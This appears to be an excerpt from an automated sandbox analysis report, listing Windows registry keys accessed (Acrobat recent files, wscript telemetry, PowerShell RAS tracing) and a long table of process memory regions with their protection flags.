HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sAssetId
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
bisSharedFile
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uPageCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 27 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1C4CFFF6000
heap
page read and write
1BA58D0E000
heap
page read and write
189FC1F0000
heap
page read and write
7FF83BABD000
trusted library allocation
page read and write
7FF83BA70000
trusted library allocation
page read and write
7FF83BA20000
trusted library allocation
page read and write
139D8AB0000
heap
page read and write
7FF83B876000
trusted library allocation
page read and write
189FBF70000
heap
page read and write
1A7C6836000
heap
page read and write
1BA5AE4C000
trusted library allocation
page read and write
1C4D04AD000
heap
page read and write
204E7F89000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
1EF4FD20000
heap
page read and write
2178E8B0000
trusted library allocation
page read and write
245935E5000
heap
page read and write
1C4CE22A000
heap
page read and write
20828170000
heap
page read and write
1C4CE22A000
heap
page read and write
24593D12000
heap
page read and write
BF5387E000
stack
page read and write
2DB327DF000
trusted library allocation
page read and write
21055E80000
heap
page read and write
1EF53495000
trusted library allocation
page read and write
2178CA60000
heap
page read and write
1C4CFFFA000
heap
page read and write
217A6AF6000
heap
page read and write
1ECD691F000
trusted library allocation
page read and write
189FE168000
heap
page read and write
1A7C6C47000
heap
page read and write
2390A152000
heap
page read and write
1C4CE20F000
heap
page read and write
1EF528A3000
trusted library allocation
page read and write
91B13BE000
stack
page read and write
2459171C000
heap
page read and write
1C4D0270000
heap
page read and write
24591788000
heap
page read and write
2546BC50000
heap
page read and write
204E74A0000
heap
page read and write
2178E534000
heap
page read and write
21055D8E000
heap
page read and write
204E74AC000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
24591990000
heap
page read and write
20811663000
trusted library allocation
page read and write
7FF83BA70000
trusted library allocation
page read and write
1C4D0008000
heap
page read and write
FE1ABFD000
stack
page read and write
2178CB9E000
heap
page read and write
1AA518D0000
trusted library allocation
page read and write
7FF83BA10000
trusted library allocation
page read and write
18C71BC0000
heap
page read and write
204E74AB000
heap
page read and write
24593D01000
heap
page read and write
2546BC3A000
heap
page read and write
B9A60FE000
stack
page read and write
85F3B23000
stack
page read and write
7FF83BA90000
trusted library allocation
page read and write
D00F43000
stack
page read and write
2546B77C000
heap
page read and write
1BA72DE0000
heap
page read and write
1C4D07D4000
heap
page read and write
1ECE6470000
trusted library allocation
page read and write
1FBDD348000
trusted library allocation
page read and write
174D4B11000
trusted library allocation
page read and write
1A8DDBB6000
heap
page read and write
1ECD6467000
trusted library allocation
page read and write
2D4A6BF000
stack
page read and write
91B10FE000
stack
page read and write
139D8A3E000
heap
page read and write
24593A3F000
heap
page read and write
174D2E98000
heap
page read and write
1C4D07FD000
heap
page read and write
245935E3000
heap
page read and write
2080F763000
trusted library allocation
page read and write
24593AA7000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
98D64FE000
stack
page read and write
139D8AB7000
heap
page read and write
1ECEE637000
heap
page read and write
21055D65000
heap
page read and write
1A8DDD23000
trusted library allocation
page read and write
139D8AB2000
heap
page read and write
1AA51417000
heap
page execute and read and write
21055E83000
heap
page read and write
139D8B20000
heap
page read and write
7FF83B951000
trusted library allocation
page read and write
1C4D0019000
heap
page read and write
7FF83B7CD000
trusted library allocation
page execute and read and write
7FF83B876000
trusted library allocation
page read and write
1FBE5370000
heap
page execute and read and write
1BA5AB92000
trusted library allocation
page read and write
7FF83B7EC000
trusted library allocation
page execute and read and write
1C4D048B000
heap
page read and write
7FF83B972000
trusted library allocation
page read and write
2459172B000
heap
page read and write
1C4D0494000
heap
page read and write
1ECD44B8000
heap
page read and write
254698E8000
heap
page read and write
7FF83B962000
trusted library allocation
page read and write
23909F80000
heap
page read and write
189FC0B0000
heap
page read and write
1C4D04C6000
heap
page read and write
7FF83B972000
trusted library allocation
page read and write
7FF83B7CD000
trusted library allocation
page execute and read and write
2546BC46000
heap
page read and write
1A7C6C36000
heap
page read and write
2390BF11000
trusted library allocation
page read and write
1C4D07C9000
heap
page read and write
7FF83B876000
trusted library allocation
page execute and read and write
2103BD1D000
heap
page read and write
18980484000
trusted library allocation
page read and write
204E74BC000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
18990010000
trusted library allocation
page read and write
2546BC25000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
1ECD65BE000
trusted library allocation
page read and write
1ECD5DF0000
trusted library allocation
page read and write
7FF83BA50000
trusted library allocation
page read and write
2459174A000
heap
page read and write
245939C0000
heap
page read and write
FE1B13E000
stack
page read and write
1BA58D00000
heap
page read and write
24593648000
heap
page read and write
7FF83B990000
trusted library allocation
page read and write
1FBCB2E0000
heap
page read and write
1A7C49DF000
heap
page read and write
2DB32626000
heap
page execute and read and write
2178E9E8000
trusted library allocation
page read and write
85F417E000
stack
page read and write
955B47E000
stack
page read and write
85F3F7D000
stack
page read and write
9FC3D7E000
stack
page read and write
24591725000
heap
page read and write
5399D77000
stack
page read and write
2546BC1E000
heap
page read and write
174D4C0D000
trusted library allocation
page read and write
24593A00000
heap
page read and write
23924110000
heap
page read and write
7FF83B962000
trusted library allocation
page read and write
7FF83B9E0000
trusted library allocation
page read and write
2459377D000
heap
page read and write
1AA617C0000
trusted library allocation
page read and write
7FF83BB30000
trusted library allocation
page read and write
2459179D000
heap
page read and write
1ECD6911000
trusted library allocation
page read and write
1A8F7EF0000
heap
page read and write
2103BCD9000
heap
page read and write
1A7C6A71000
heap
page read and write
1A8F7EDB000
heap
page read and write
1898009C000
trusted library allocation
page read and write
1A7C6440000
heap
page read and write
24593AA2000
heap
page read and write
2459361E000
heap
page read and write
139D8AAC000
heap
page read and write
1A8DFA8F000
trusted library allocation
page read and write
1AA4F840000
heap
page read and write
24593D46000
heap
page read and write
1BA5AB82000
trusted library allocation
page read and write
21790552000
trusted library allocation
page read and write
24593ABE000
heap
page read and write
217A6E0E000
heap
page read and write
1FBCB310000
heap
page read and write
85F3BAF000
stack
page read and write
2546BC39000
heap
page read and write
2546BA22000
heap
page read and write
7FF83B7C4000
trusted library allocation
page read and write
174ECE0B000
heap
page read and write
139D8A88000
heap
page read and write
1A8E10BB000
trusted library allocation
page read and write
1ECD6926000
trusted library allocation
page read and write
1C4CE1EC000
heap
page read and write
1C4CE17D000
heap
page read and write
24593ABA000
heap
page read and write
24593628000
heap
page read and write
1A8DDD20000
trusted library allocation
page read and write
24593648000
heap
page read and write
245917A3000
heap
page read and write
1C4D04DF000
heap
page read and write
1AA4FB15000
heap
page read and write
2390C015000
trusted library allocation
page read and write
2179E9B1000
trusted library allocation
page read and write
1ECD6AB1000
trusted library allocation
page read and write
1A7C6855000
heap
page read and write
117DCFC000
stack
page read and write
1AA51C7E000
trusted library allocation
page read and write
174D2E96000
heap
page read and write
1A8DDC90000
trusted library allocation
page read and write
1C4CE1B2000
heap
page read and write
1EF4FDF3000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
7FF83BAE0000
trusted library allocation
page read and write
1BA5AE8C000
trusted library allocation
page read and write
2546BF06000
heap
page read and write
139D8A39000
heap
page read and write
1C4D0461000
heap
page read and write
24591727000
heap
page read and write
2546BC49000
heap
page read and write
245935EF000
heap
page read and write
1ECD4431000
heap
page read and write
1BA72D26000
heap
page read and write
2546B751000
heap
page read and write
24591791000
heap
page read and write
7FF83B7B0000
trusted library allocation
page read and write
7FF83B971000
trusted library allocation
page read and write
1BA58BB0000
heap
page read and write
1C4CFFED000
heap
page read and write
2546B76C000
heap
page read and write
883C6B8000
stack
page read and write
64F56FF000
stack
page read and write
2546BA54000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
1C4CE206000
heap
page read and write
7FF83BA30000
trusted library allocation
page read and write
18990070000
trusted library allocation
page read and write
1898046D000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
24593A75000
heap
page read and write
1ECD5E10000
trusted library allocation
page read and write
1C4D085E000
heap
page read and write
189FC000000
heap
page read and write
9FC35CE000
stack
page read and write
FE1A7C3000
stack
page read and write
2DB307D0000
heap
page read and write
1C4D0489000
heap
page read and write
7FF83B7A4000
trusted library allocation
page read and write
100073000
stack
page read and write
1C4D0471000
heap
page read and write
2459360C000
heap
page read and write
2546BA27000
heap
page read and write
1A7C684C000
heap
page read and write
23924022000
heap
page read and write
955B3FE000
stack
page read and write
7FF83BAB0000
trusted library allocation
page read and write
1C4D04D5000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
7FF83BAD0000
trusted library allocation
page read and write
1C4D04E3000
heap
page read and write
1C4CE21B000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
139D8A86000
heap
page read and write
2080F7B0000
heap
page read and write
1ECEE618000
heap
page read and write
1BA5AF7D000
trusted library allocation
page read and write
1ECD6952000
trusted library allocation
page read and write
2178E986000
heap
page execute and read and write
24593AB1000
heap
page read and write
2103BD15000
heap
page read and write
1C4CE1A2000
heap
page read and write
1A7C4950000
heap
page read and write
204E748B000
heap
page read and write
24593D15000
heap
page read and write
7FF83B88C000
trusted library allocation
page execute and read and write
139D8A3D000
heap
page read and write
18C6FF35000
heap
page read and write
1C4D03D0000
remote allocation
page read and write
7FF83B950000
trusted library allocation
page execute and read and write
1C4D041C000
heap
page read and write
204E7A66000
heap
page read and write
24591767000
heap
page read and write
1A7C67C0000
heap
page read and write
1ECD45D0000
heap
page read and write
1ECD6824000
trusted library allocation
page read and write
7FF83B960000
trusted library allocation
page execute and read and write
18C6FF30000
heap
page read and write
1EF51B60000
heap
page execute and read and write
B9A62B9000
stack
page read and write
1C4CE1E6000
heap
page read and write
1FBE5387000
heap
page read and write
1ECD699B000
trusted library allocation
page read and write
245935F6000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
7FF83BA10000
trusted library allocation
page read and write
1ECD43C0000
heap
page read and write
7FF83BA20000
trusted library allocation
page read and write
56173FE000
stack
page read and write
1EF69D80000
heap
page read and write
56175BE000
stack
page read and write
18C0051E000
trusted library allocation
page read and write
2546B78D000
heap
page read and write
1A7C6820000
heap
page read and write
24593628000
heap
page read and write
2178CB8A000
heap
page read and write
2D4A73E000
stack
page read and write
B9A63BF000
stack
page read and write
1000FF000
stack
page read and write
24593AAC000
heap
page read and write
2178CC40000
heap
page read and write
1ECD64C1000
trusted library allocation
page read and write
2DB327F7000
trusted library allocation
page read and write
7FF83B8B0000
trusted library allocation
page execute and read and write
2178E450000
heap
page read and write
2D49DE3000
stack
page read and write
1BA5ABDE000
trusted library allocation
page read and write
1ECE6461000
trusted library allocation
page read and write
2DB327E2000
trusted library allocation
page read and write
139D8A2B000
heap
page read and write
1BA58CE0000
heap
page read and write
1C4D0830000
heap
page read and write
1C4D04AA000
heap
page read and write
2390BA70000
trusted library allocation
page read and write
189804B9000
trusted library allocation
page read and write
1BA5AB06000
trusted library allocation
page read and write
24591724000
heap
page read and write
2103DC2E000
trusted library allocation
page read and write
1C4D0868000
heap
page read and write
139D8AB0000
heap
page read and write
1C4CE1A6000
heap
page read and write
955B2FD000
stack
page read and write
1C4D07D4000
heap
page read and write
24593A83000
heap
page read and write
2546BF01000
heap
page read and write
1A7C6F1D000
heap
page read and write
1ECD64FB000
trusted library allocation
page read and write
1C4D07D5000
heap
page read and write
139D8A86000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
1ECEE744000
heap
page read and write
7FF83B9E0000
trusted library allocation
page read and write
7FF83B7EC000
trusted library allocation
page execute and read and write
7FF83B97A000
trusted library allocation
page read and write
174E4B24000
trusted library allocation
page read and write
204E7494000
heap
page read and write
2103F819000
trusted library allocation
page read and write
1C4D0854000
heap
page read and write
1ECEE460000
heap
page execute and read and write
2390BF21000
trusted library allocation
page read and write
2103BD1B000
heap
page read and write
7FF83B8B6000
trusted library allocation
page execute and read and write
FE1B0BF000
stack
page read and write
1A7C6836000
heap
page read and write
18C71C22000
heap
page read and write
139D8A86000
heap
page read and write
7FF83B886000
trusted library allocation
page execute and read and write
1A7C6855000
heap
page read and write
7FF83B87C000
trusted library allocation
page execute and read and write
204E743C000
heap
page read and write
7FF83BB00000
trusted library allocation
page read and write
20811503000
trusted library allocation
page read and write
BF53AB9000
stack
page read and write
FE1AD7E000
stack
page read and write
7FF83B8B6000
trusted library allocation
page execute and read and write
1C4CE20C000
heap
page read and write
1C4D000C000
heap
page read and write
1C4D0022000
heap
page read and write
1C4D0493000
heap
page read and write
1ECD5E20000
heap
page readonly
7FF83B9A0000
trusted library allocation
page execute and read and write
174D4B71000
trusted library allocation
page read and write
2DB32739000
trusted library allocation
page read and write
139D8A37000
heap
page read and write
1AA69860000
heap
page read and write
7FF83B82C000
trusted library allocation
page execute and read and write
1BA72EC0000
heap
page read and write
174D2F3D000
heap
page read and write
2103BD56000
heap
page read and write
1A7C6C47000
heap
page read and write
7FF83B7C4000
trusted library allocation
page read and write
1A7C6C26000
heap
page read and write
2390A085000
heap
page read and write
18C6FE20000
trusted library allocation
page read and write
883C83E000
stack
page read and write
7FF83B982000
trusted library allocation
page read and write
2390BFFD000
trusted library allocation
page read and write
9FC387F000
stack
page read and write
2546BA2A000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
7FF83B95A000
trusted library allocation
page read and write
1AA51C31000
trusted library allocation
page read and write
23924020000
heap
page read and write
955AF13000
stack
page read and write
7FF83BAD0000
trusted library allocation
page read and write
85F3FFE000
stack
page read and write
1C4CE1B6000
heap
page read and write
217A6AE5000
heap
page read and write
1C4CE20C000
heap
page read and write
2390BF4E000
trusted library allocation
page read and write
1C4CE1EC000
heap
page read and write
1BA58D20000
heap
page read and write
1C4D04C6000
heap
page read and write
7FF83BB00000
trusted library allocation
page read and write
204E7CA6000
heap
page read and write
1C4CE21B000
heap
page read and write
2103F7FE000
trusted library allocation
page read and write
139D8AB4000
heap
page read and write
1C4D000C000
heap
page read and write
883C63C000
stack
page read and write
1C4CE4EE000
heap
page read and write
1C4D0484000
heap
page read and write
1C4CE22A000
heap
page read and write
7FF83BA60000
trusted library allocation
page read and write
1A7C6C6D000
heap
page read and write
BF536FF000
stack
page read and write
1FBE540E000
heap
page read and write
2546B789000
heap
page read and write
1FBE53BE000
heap
page read and write
204E7F72000
heap
page read and write
7FF83B8E0000
trusted library allocation
page execute and read and write
117E4FE000
stack
page read and write
2546B73A000
heap
page read and write
2179EB53000
trusted library allocation
page read and write
1C4D02B5000
heap
page read and write
1C4CE1D3000
heap
page read and write
1C4D04F8000
heap
page read and write
2546BF00000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
7FF83BA70000
trusted library allocation
page read and write
1C4D0294000
heap
page read and write
1C4D04EC000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
1BA5A630000
trusted library allocation
page read and write
1EF53331000
trusted library allocation
page read and write
7FF83B876000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
7FF83BB00000
trusted library allocation
page read and write
2459178E000
heap
page read and write
18C71C4E000
heap
page read and write
189FC120000
heap
page execute and read and write
189FBFEC000
heap
page read and write
1A7C49B6000
heap
page read and write
2546B771000
heap
page read and write
1A7C6C37000
heap
page read and write
1C4D084B000
heap
page read and write
1A7C68F0000
remote allocation
page read and write
7FF83BAC0000
trusted library allocation
page read and write
174ECD76000
heap
page execute and read and write
B9A700D000
stack
page read and write
1C4CE1A0000
heap
page read and write
2546B761000
heap
page read and write
24593A40000
heap
page read and write
1A7C6813000
heap
page read and write
174D2CB0000
heap
page read and write
245935E4000
heap
page read and write
1C4D0852000
heap
page read and write
25469B55000
heap
page read and write
2080E100000
heap
page readonly
1ECD6991000
trusted library allocation
page read and write
7FF83BAC0000
trusted library allocation
page read and write
245935E9000
heap
page read and write
7FF83B886000
trusted library allocation
page execute and read and write
1EF4FF80000
heap
page read and write
2546B7B8000
heap
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
2390BF5B000
trusted library allocation
page read and write
2080DEC9000
heap
page read and write
1C4D04EB000
heap
page read and write
7FF83B860000
trusted library allocation
page execute and read and write
1ECD6587000
trusted library allocation
page read and write
7FF83BB20000
trusted library allocation
page read and write
1ECEE537000
heap
page execute and read and write
139D8A16000
heap
page read and write
1A8E10C0000
trusted library allocation
page read and write
1C4CE22A000
heap
page read and write
204E749F000
heap
page read and write
204E7F7E000
heap
page read and write
1C4CE1F8000
heap
page read and write
2080F7B4000
heap
page read and write
1C4CFFFB000
heap
page read and write
174D4BAC000
trusted library allocation
page read and write
955B37F000
stack
page read and write
1C4CFFE1000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
7FF83B840000
trusted library allocation
page read and write
1C4D001C000
heap
page read and write
1A7C49CC000
heap
page read and write
18C000F8000
trusted library allocation
page read and write
1A7C6829000
heap
page read and write
7FF83B886000
trusted library allocation
page read and write
883BF52000
stack
page read and write
1AA5180F000
trusted library allocation
page read and write
2080DE40000
heap
page read and write
204E7C8E000
heap
page read and write
204E7CAE000
heap
page read and write
1C4D07FA000
heap
page read and write
100679000
stack
page read and write
1C4CE21B000
heap
page read and write
1C4D008F000
heap
page read and write
2459176C000
heap
page read and write
1ECD6472000
trusted library allocation
page read and write
18C71B80000
heap
page execute and read and write
7FF83B9F0000
trusted library allocation
page read and write
1ECD6579000
trusted library allocation
page read and write
1AA69B20000
heap
page read and write
2D4A3F9000
stack
page read and write
1EF4FD8E000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
245936E0000
remote allocation
page read and write
208118D1000
trusted library allocation
page read and write
D00FCE000
stack
page read and write
7FF83B7D0000
trusted library allocation
page read and write
2546B764000
heap
page read and write
1C4CFFE4000
heap
page read and write
1FBCB397000
heap
page read and write
F509AFD000
stack
page read and write
7FF83B7EC000
trusted library allocation
page execute and read and write
1BA58DB5000
heap
page read and write
7FF83B79D000
trusted library allocation
page execute and read and write
2390A16A000
heap
page read and write
2546B768000
heap
page read and write
139D8AB7000
heap
page read and write
7FF83B960000
trusted library allocation
page execute and read and write
18C00105000
trusted library allocation
page read and write
2459377A000
heap
page read and write
204E7B80000
remote allocation
page read and write
539AA4E000
stack
page read and write
24591788000
heap
page read and write
2104DEA4000
trusted library allocation
page read and write
24593A9C000
heap
page read and write
1EF53645000
trusted library allocation
page read and write
24591770000
heap
page read and write
208113A8000
trusted library allocation
page read and write
1ECD6495000
trusted library allocation
page read and write
85F447E000
stack
page read and write
139D8A3C000
heap
page read and write
B9A5FFE000
stack
page read and write
7FF83B9A0000
trusted library allocation
page execute and read and write
1C4CE206000
heap
page read and write
139D8C40000
remote allocation
page read and write
91B173E000
stack
page read and write
2103F8B7000
trusted library allocation
page read and write
7FF83B7C2000
trusted library allocation
page read and write
1C4D0041000
heap
page read and write
24593A82000
heap
page read and write
2103DA60000
heap
page read and write
21055BB1000
heap
page read and write
7FF7A1780000
unkown
page readonly
9FC358F000
stack
page read and write
18C6FD02000
heap
page read and write
1ECD43DA000
heap
page read and write
2DB4AC20000
heap
page read and write
7FF83B8A6000
trusted library allocation
page execute and read and write
2178E9E6000
trusted library allocation
page read and write
7FF83B98A000
trusted library allocation
page read and write
1A7C6826000
heap
page read and write
1C4CE340000
heap
page read and write
24593628000
heap
page read and write
1C4D000C000
heap
page read and write
139D8A35000
heap
page read and write
1A7C690A000
heap
page read and write
7DF49E280000
trusted library allocation
page execute and read and write
7FF83BAB0000
trusted library allocation
page read and write
2546BBE8000
heap
page read and write
24593D1B000
heap
page read and write
7FF83B84E000
trusted library allocation
page execute and read and write
2546BA24000
heap
page read and write
1C4D0296000
heap
page read and write
1FBCD319000
trusted library allocation
page read and write
139D8AB0000
heap
page read and write
1FBCB675000
heap
page read and write
24593D38000
heap
page read and write
2DB32831000
trusted library allocation
page read and write
7FF83BAE0000
trusted library allocation
page read and write
BF532E3000
stack
page read and write
7FF83B8F0000
trusted library allocation
page execute and read and write
7FF83B7E0000
trusted library allocation
page read and write
7FF83B7C3000
trusted library allocation
page execute and read and write
BF5468F000
stack
page read and write
2179004D000
trusted library allocation
page read and write
1C4D04D1000
heap
page read and write
1C4D04B8000
heap
page read and write
18C6FE30000
heap
page readonly
57695FB000
stack
page read and write
139D8A88000
heap
page read and write
1A8EFA85000
trusted library allocation
page read and write
7FF83B7C4000
trusted library allocation
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
1A8DDD84000
heap
page read and write
7FF83B970000
trusted library allocation
page execute and read and write
1C4CFFD4000
heap
page read and write
1EF69DD9000
heap
page read and write
7FF83B792000
trusted library allocation
page read and write
1FBE5376000
heap
page execute and read and write
245919C0000
heap
page read and write
2103D6C0000
trusted library allocation
page read and write
117DEFE000
stack
page read and write
1FBCDB60000
trusted library allocation
page read and write
18C10078000
trusted library allocation
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
2546B7B8000
heap
page read and write
245916A0000
heap
page read and write
7FF7A1781000
unkown
page execute read
1C4D0471000
heap
page read and write
1A8E10E5000
trusted library allocation
page read and write
7FF83B88C000
trusted library allocation
page execute and read and write
7FF83B9F0000
trusted library allocation
page read and write
2DB32774000
trusted library allocation
page read and write
2DB30A25000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
10083E000
stack
page read and write
1A8DDB10000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
56678FB000
stack
page read and write
174D4B59000
trusted library allocation
page read and write
7FF83B9E0000
trusted library allocation
page read and write
1C4D04E4000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
139D8A86000
heap
page read and write
1A7C6C3F000
heap
page read and write
D0137E000
stack
page read and write
7FF83BA30000
trusted library allocation
page read and write
139D8AB7000
heap
page read and write
24593D52000
heap
page read and write
254699B4000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
189FBE70000
heap
page read and write
7FF83BA30000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
1ECD6997000
trusted library allocation
page read and write
5399C7E000
stack
page read and write
1A8F7F09000
heap
page read and write
7FF83B7A0000
trusted library allocation
page read and write
7FF83B7AB000
trusted library allocation
page read and write
7FF83BA61000
trusted library allocation
page read and write
B9A6F8E000
stack
page read and write
2104DBB1000
trusted library allocation
page read and write
139D8AB7000
heap
page read and write
7FF83B7EC000
trusted library allocation
page execute and read and write
254699AA000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
7FF83B9A2000
trusted library allocation
page read and write
139D8A3B000
heap
page read and write
245918A0000
heap
page read and write
2DB3080A000
heap
page read and write
24593681000
heap
page read and write
7FF83B81C000
trusted library allocation
page execute and read and write
7FF83B981000
trusted library allocation
page read and write
189FDFA6000
heap
page read and write
5399AFD000
stack
page read and write
91B0DDE000
stack
page read and write
7FF83B9C0000
trusted library allocation
page read and write
1ECD441D000
heap
page read and write
7FF83B990000
trusted library allocation
page read and write
7FF83B9F0000
trusted library allocation
page read and write
204E7471000
heap
page read and write
1C4D04F6000
heap
page read and write
204E7C81000
heap
page read and write
23924075000
heap
page read and write
2DB32723000
trusted library allocation
page read and write
204E747B000
heap
page read and write
1C4D0006000
heap
page read and write
24591725000
heap
page read and write
1C4D04F1000
heap
page read and write
1BA5A620000
heap
page read and write
174E4B11000
trusted library allocation
page read and write
566747E000
stack
page read and write
2080FCB1000
trusted library allocation
page read and write
2546BA52000
heap
page read and write
189FC150000
heap
page read and write
1007BB000
stack
page read and write
2DB326D0000
heap
page execute and read and write
2391BF89000
trusted library allocation
page read and write
7FF83B94A000
trusted library allocation
page read and write
21055E60000
heap
page read and write
1C4CE1AF000
heap
page read and write
24591706000
heap
page read and write
24593648000
heap
page read and write
98D69FE000
stack
page read and write
1C4D04AB000
heap
page read and write
174D2F70000
heap
page readonly
B9A5EFE000
stack
page read and write
1AA4F860000
heap
page read and write
7FF83B972000
trusted library allocation
page read and write
1C4CE1A2000
heap
page read and write
1C4D0015000
heap
page read and write
2081150C000
trusted library allocation
page read and write
204E7B80000
remote allocation
page read and write
1C4CE1C1000
heap
page read and write
9FC48CE000
stack
page read and write
1BA5AE73000
trusted library allocation
page read and write
204E7473000
heap
page read and write
1C4CE17E000
heap
page read and write
1ECD6785000
trusted library allocation
page read and write
204E7450000
heap
page read and write
7FF83B79D000
trusted library allocation
page execute and read and write
1ECD44C6000
heap
page read and write
1C4CE1E8000
heap
page read and write
2546B7B8000
heap
page read and write
7FF83BA70000
trusted library allocation
page read and write
1ECD5F20000
heap
page read and write
217A6D20000
heap
page execute and read and write
1BA72D13000
heap
page read and write
1A7C499D000
heap
page read and write
1C4D0058000
heap
page read and write
7FF83B960000
trusted library allocation
page read and write
7FF83B8A6000
trusted library allocation
page execute and read and write
174D2F90000
trusted library allocation
page read and write
21790672000
trusted library allocation
page read and write
1EF61C80000
trusted library allocation
page read and write
2459361E000
heap
page read and write
7FF83B7C3000
trusted library allocation
page execute and read and write
7FF83BA40000
trusted library allocation
page read and write
1A8EFA21000
trusted library allocation
page read and write
245939FC000
heap
page read and write
189FE04B000
heap
page read and write
2459361E000
heap
page read and write
1C4CE4EA000
heap
page read and write
1A7C6836000
heap
page read and write
24593A5A000
heap
page read and write
174ECD70000
heap
page execute and read and write
1C4CFFDD000
heap
page read and write
2080E114000
heap
page read and write
1ECD6ABC000
trusted library allocation
page read and write
1C4D084B000
heap
page read and write
1AA51C1A000
trusted library allocation
page read and write
245935EC000
heap
page read and write
1A7C4950000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
7FF83BA8D000
trusted library allocation
page read and write
1A8F7C18000
heap
page read and write
FE1AB7E000
stack
page read and write
1C4D0054000
heap
page read and write
7FF83B8F0000
trusted library allocation
page execute and read and write
2459172C000
heap
page read and write
1EF69E28000
heap
page read and write
2390BF6E000
trusted library allocation
page read and write
7FF83B95A000
trusted library allocation
page read and write
2DB4AC30000
heap
page read and write
24593D02000
heap
page read and write
18C6FD49000
heap
page read and write
1C4CE1AB000
heap
page read and write
1C4D0058000
heap
page read and write
1AA4FA50000
trusted library allocation
page read and write
7FF83BAD0000
trusted library allocation
page read and write
2103DDDE000
trusted library allocation
page read and write
566737E000
stack
page read and write
1C4CE4EC000
heap
page read and write
1FBCD2C0000
heap
page execute and read and write
189FE081000
heap
page read and write
21056150000
heap
page read and write
10047D000
stack
page read and write
1C4D0470000
heap
page read and write
64F54FE000
stack
page read and write
1C4D0469000
heap
page read and write
24593628000
heap
page read and write
217A6AB0000
heap
page read and write
1A7C6837000
heap
page read and write
2D4A07E000
stack
page read and write
204E74BA000
heap
page read and write
1BA6AAF7000
trusted library allocation
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
1A7C6C30000
heap
page read and write
2DB321F0000
trusted library allocation
page read and write
1EF4FDCC000
heap
page read and write
18C000FB000
trusted library allocation
page read and write
2105615A000
heap
page read and write
204E749F000
heap
page read and write
24593648000
heap
page read and write
1C4D04AA000
heap
page read and write
20811996000
trusted library allocation
page read and write
7FF83B890000
trusted library allocation
page execute and read and write
204E7C88000
heap
page read and write
1BA58E30000
trusted library allocation
page read and write
5617479000
stack
page read and write
1C4D0472000
heap
page read and write
24593D68000
heap
